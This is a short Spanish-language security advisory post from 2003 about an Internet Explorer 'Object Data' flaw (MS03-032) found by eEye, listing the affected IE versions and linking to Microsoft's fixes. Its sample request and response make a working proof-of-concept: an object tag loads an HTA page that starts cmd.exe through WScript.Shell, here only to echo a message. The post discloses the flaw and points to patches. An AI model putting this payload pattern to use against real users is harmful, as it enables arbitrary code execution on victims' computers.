Otra Vulnerabilidad en Internet Explorer Object Data
Agosto 21, 03 by adminProblema:
eEye Digital Security ha encontrado una vulnerabilidad en Internet Explorer esto permitiria a un atacante la ejecución de codigo arbitrariamente en el sistema del usuario, si el usuario
visita una pagina web maliciosa o si abre un codigo HTML malicioso en un e-mail.
Ejemplo de como un atacante puede explotar esta vulnerabilidad:
————–Cliente HTTP request—————————
<html>
…
<object data="www.yourinternethost.com/yourexploitwebpageorcgi.html">
</object>
</html>
————————————————————
————-Servidor HTTP Respuesta—————————
HTTP/1.1 200 OK
Date: Tue, 13 May 2003 18:06:43 GMT
Server: Apache
Content-Type: application/hta
Content-Length: 191
<html>
<object id=’wsh’ classid=’clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B’></object>
<script>
wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS");
</script>
</html>
————————————————————
Versiones vulnerables:
Microsoft Internet Explorer 5.0.1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
Solución:
Para solucionar esta vulnerabilidad puede instalar los siguientes fixes desde:
http://windowsupdate.microsoft.com/
http://www.microsoft.com/windows/ie/downloads/critical/822925/default.asp
Referencias
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-032.asp
http://www.eeye.com/html/Research/Advisories/AD20030820.html
